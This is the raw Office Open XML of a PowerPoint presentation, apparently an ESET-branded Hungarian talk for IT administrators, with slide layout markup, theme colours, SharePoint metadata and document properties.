                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DAF1B83-2A5E-3C37-0990-EE707B4DC2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p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5763440" y="3501119"/>
                <a:ext cx="560981" cy="560981"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="34" name="Graphic 33">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2C90FF5-A952-364D-8433-7B8AD3767F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p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5763440" y="4716713"/>
                <a:ext cx="560981" cy="560981"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="35" name="Graphic 34">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DC5F8AE-E188-28BC-D7D8-7953CF85F6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p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5782139" y="5919906"/>
                <a:ext cx="523582" cy="523582"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic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272ADD99-DC45-EBD1-202F-A50BFC8910A0}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5760212" y="4420881"/>
                <a:ext cx="5616625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7B5E06D7-D575-3814-326B-EF371D08CA18}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5760212" y="5547932"/>
                <a:ext cx="5616625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0A053FB1-D7D5-B8E2-DEFE-67380BDBEC66}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5660289" y="7975601"/>
              <a:ext cx="5716548" cy="1168399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720000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-GB" sz="1800">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>INCIDENT ACTIONS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Triangle 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1BDC24B-F3A9-3051-0AA0-B8A08EFD07F9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="10594664" y="8465598"/>
              <a:ext cx="426260" cy="210887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720000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="sk-SK" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:endParaRP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57ADA2DF-538A-9C07-BE42-2359BBEA3EDF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5660289" y="5733171"/>
              <a:ext cx="5716546" cy="940360"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="1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720000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:endParaRP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E7BBA449-125E-015E-288E-D8FD61079945}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5660289" y="4557301"/>
              <a:ext cx="5716546" cy="940360"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="10272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720000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:endParaRP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629CAE00-CF63-50AB-316F-902BB0B44884}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5660289" y="2468488"/>
              <a:ext cx="5716546" cy="940360"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="10272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720000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="!!Agenda">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D353D653-61A0-B693-BB4F-C4CB001ADC6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1576297" y="921237"/>
            <a:ext cx="5358657" cy="838155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="187631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923"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1862" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4754" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4754" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>anagement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4754" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4754" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Agent</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4754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7990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 animBg="1"/>
    </p:bldLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="ESET_Theme">
  <a:themeElements>
    <a:clrScheme name="ESET">
      <a:dk1>
        <a:srgbClr val="0A1823"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="000000"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="F4F5F4"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="0096A1"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="FEAA3A"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="FE6142"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="D80B55"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="B19ADF"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="004B55"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="00717F"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="00BBC5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ESET Mid Turquoise">
      <a:srgbClr val="0096A1"/>
    </a:custClr>
    <a:custClr name="ESET Heavy Turquoise">
      <a:srgbClr val="004B55"/>
    </a:custClr>
    <a:custClr name="ESET Dark Turquoise">
      <a:srgbClr val="00717F"/>
    </a:custClr>
    <a:custClr name="ESET Bright Turquoise">
      <a:srgbClr val="00BBC5"/>
    </a:custClr>
    <a:custClr name="ESET Light Turquoise">
      <a:srgbClr val="87CFD3"/>
    </a:custClr>
    <a:custClr name="ESET Black">
      <a:srgbClr val="000000"/>
    </a:custClr>
    <a:custClr name="ESET Dark">
      <a:srgbClr val="0A1823"/>
    </a:custClr>
    <a:custClr name="ESET Blue Grey">
      <a:srgbClr val="424D56"/>
    </a:custClr>
    <a:custClr name="ESET Mid Grey">
      <a:srgbClr val="949CA1"/>
    </a:custClr>
    <a:custClr name="ESET Sky Grey">
      <a:srgbClr val="BDD0D8"/>
    </a:custClr>
    <a:custClr name="ESET Concrete">
      <a:srgbClr val="DBDEDB"/>
    </a:custClr>
    <a:custClr name="ESET Light Concrete">
      <a:srgbClr val="F4F5F4"/>
    </a:custClr>
    <a:custClr name="ESET White">
      <a:srgbClr val="F4F5F4"/>
    </a:custClr>
    <a:custClr name="ESET Green">
      <a:srgbClr val="8DC63F"/>
    </a:custClr>
    <a:custClr name="ESET Green Light">
      <a:srgbClr val="BAE27A"/>
    </a:custClr>
    <a:custClr name="ESET Yellow">
      <a:srgbClr val="FEAA3A"/>
    </a:custClr>
    <a:custClr name="ESET Yellow Light">
      <a:srgbClr val="FCD080"/>
    </a:custClr>
    <a:custClr name="ESET Orange">
      <a:srgbClr val="FE6142"/>
    </a:custClr>
    <a:custClr name="ESET Orange Light">
      <a:srgbClr val="F7816D"/>
    </a:custClr>
    <a:custClr name="ESET Crimson">
      <a:srgbClr val="D80B55"/>
    </a:custClr>
    <a:custClr name="ESET Crimson Light">
      <a:srgbClr val="EA6CB1"/>
    </a:custClr>
    <a:custClr name="ESET Purple">
      <a:srgbClr val="B19ADF"/>
    </a:custClr>
    <a:custClr name="ESET Purple Light">
      <a:srgbClr val="D5CAEF"/>
    </a:custClr>
    <a:custClr name="ESET Blue">
      <a:srgbClr val="00C0F2"/>
    </a:custClr>
    <a:custClr name="ESET Blue Light">
      <a:srgbClr val="9FD5F1"/>
    </a:custClr>
  </a:custClrLst>
  <a:extLst>
    <a:ext uri="{05A4C25C-085E-4340-85A3-A5531E510DB2}">
      <thm15:themeFamily xmlns:thm15="http://schemas.microsoft.com/office/thememl/2012/main" name="ESET_Theme" id="{98D856F7-7B46-CA43-9555-A14E6647DD40}" vid="{40E71E41-20B1-1544-8F73-9EF2C95A15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F202094A76E984EB3DD1E1F613C4F51" ma:contentTypeVersion="13" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="4b2041c64520f33ea62a910be09eaceb">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="6d84d6e5-4354-4d2d-8960-93993c2f5e0d" xmlns:ns3="3a21d5cc-e129-4d5a-b02b-0f1416c2cc88" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="7ec027455ed81f2c01fcd5b967dbbfa8" ns2:_="" ns3:_="">
    <xsd:import namespace="6d84d6e5-4354-4d2d-8960-93993c2f5e0d"/>
    <xsd:import namespace="3a21d5cc-e129-4d5a-b02b-0f1416c2cc8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84d6e5-4354-4d2d-8960-93993c2f5e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8043c7f9-807c-4998-8edc-f797ae1abb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21d5cc-e129-4d5a-b02b-0f1416c2cc88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f52a2b4b-44e9-4d89-a123-4f308426a456}" ma:internalName="TaxCatchAll" ma:showField="CatchAllData" ma:web="3a21d5cc-e129-4d5a-b02b-0f1416c2cc8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d84d6e5-4354-4d2d-8960-93993c2f5e0d">
      <Terms xmlns="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    </lcf76f155ced4ddcb4097134ff3c332f>
    <TaxCatchAll xmlns="3a21d5cc-e129-4d5a-b02b-0f1416c2cc88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5E53278-53E9-45DD-8624-D343B714368A}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="3a21d5cc-e129-4d5a-b02b-0f1416c2cc88"/>
    <ds:schemaRef ds:uri="6d84d6e5-4354-4d2d-8960-93993c2f5e0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14A1F2D-07A1-4725-A61A-A64A1AFC0080}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/documentManagement/types"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/terms/"/>
    <ds:schemaRef ds:uri="http://www.w3.org/XML/1998/namespace"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/dcmitype/"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="6d84d6e5-4354-4d2d-8960-93993c2f5e0d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3a21d5cc-e129-4d5a-b02b-0f1416c2cc88"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{F694623B-44F8-4D54-8587-DD002FA115E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ESET_CinemaEvent_2022</Template>
  <TotalTime>763</TotalTime>
  <Words>2744</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Egyéni</PresentationFormat>
  <Paragraphs>374</Paragraphs>
  <Slides>33</Slides>
  <Notes>30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11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33</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="45" baseType="lpstr">
      <vt:lpstr>Aptos</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Bold</vt:lpstr>
      <vt:lpstr>Calibri Regular</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Fedra Sans Alt Pro Book LF</vt:lpstr>
      <vt:lpstr>Helvetica</vt:lpstr>
      <vt:lpstr>IntelOne Display Regular</vt:lpstr>
      <vt:lpstr>Microsoft GothicNeo</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>ESET_Theme</vt:lpstr>
      <vt:lpstr>PowerPoint-bemutató</vt:lpstr>
      <vt:lpstr>IT adminok napi teendői</vt:lpstr>
      <vt:lpstr>Mivel foglalkoznak valójában?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>ESET, spol. s r.o.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Béres Péter</cp:lastModifiedBy>
  <cp:revision>23</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-06-18T14:29:45Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-16T07:04:43Z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0x0101009F202094A76E984EB3DD1E1F613C4F51</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ClassificationContentMarkingHeaderLocations">
    <vt:lpwstr>ESET_Theme:3</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ClassificationContentMarkingHeaderText">
    <vt:lpwstr>INTERNAL</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="MSIP_Label_bb10adb1-b2c9-4a03-ad0d-caa51a32bdbf_Enabled">
    <vt:lpwstr>true</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="MSIP_Label_bb10adb1-b2c9-4a03-ad0d-caa51a32bdbf_SetDate">
    <vt:lpwstr>2025-03-12T10:59:51Z</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="MSIP_Label_bb10adb1-b2c9-4a03-ad0d-caa51a32bdbf_Method">
    <vt:lpwstr>Privileged</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_bb10adb1-b2c9-4a03-ad0d-caa51a32bdbf_Name">
    <vt:lpwstr>Internal</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="9" name="MSIP_Label_bb10adb1-b2c9-4a03-ad0d-caa51a32bdbf_SiteId">
    <vt:lpwstr>01f7e0e8-c680-4293-8068-d572231a88f4</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="10" name="MSIP_Label_bb10adb1-b2c9-4a03-ad0d-caa51a32bdbf_ActionId">
    <vt:lpwstr>b2ff25d5-2862-443b-acc0-3a1f4607fdfd</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="11" name="MSIP_Label_bb10adb1-b2c9-4a03-ad0d-caa51a32bdbf_ContentBits">
    <vt:lpwstr>1</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="12" name="MSIP_Label_bb10adb1-b2c9-4a03-ad0d-caa51a32bdbf_Tag">
    <vt:lpwstr>10, 0, 1, 2</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="13" name="MediaServiceImageTags">
    <vt:lpwstr/>
  </property>
</Properties>
</file>